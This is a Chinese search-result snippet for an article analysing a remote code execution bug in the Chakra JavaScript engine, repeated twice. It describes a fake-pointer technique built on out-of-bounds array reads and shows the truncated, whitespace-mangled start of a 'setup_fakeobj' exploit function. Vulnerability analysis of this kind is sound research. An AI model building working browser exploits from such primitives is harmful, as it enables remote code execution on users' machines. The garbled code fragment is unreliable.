对一个chakra引擎中RCE漏洞的完整分析
2019年10月9日 - 网易
然后,我们就能够在float数组中存储伪指针值,并通过从对象数组段中读出超出范围的未绑定值表示指针的边界来获取指针句柄。functionsetup_fakeobj(addr){for(vari=0;i<100;i++){fakeobj_hax=[{}];fakeobj_hax2=[addr];fakeobj_hax[0x7000]=0x200000fakeobj_hax2[0x7000...
详情
然后,我们就能够在float数组中存储伪指针值,并通过从对象数组段中读出超出范围的未绑定值表示指针的边界来获取指针句柄。functionsetup_fakeobj(addr){for(vari=0;i<100;i++){fakeobj_hax=[{}];fakeobj_hax2=[addr];fakeobj_hax[0x7000]=0x200000fakeobj_hax2[0x7000...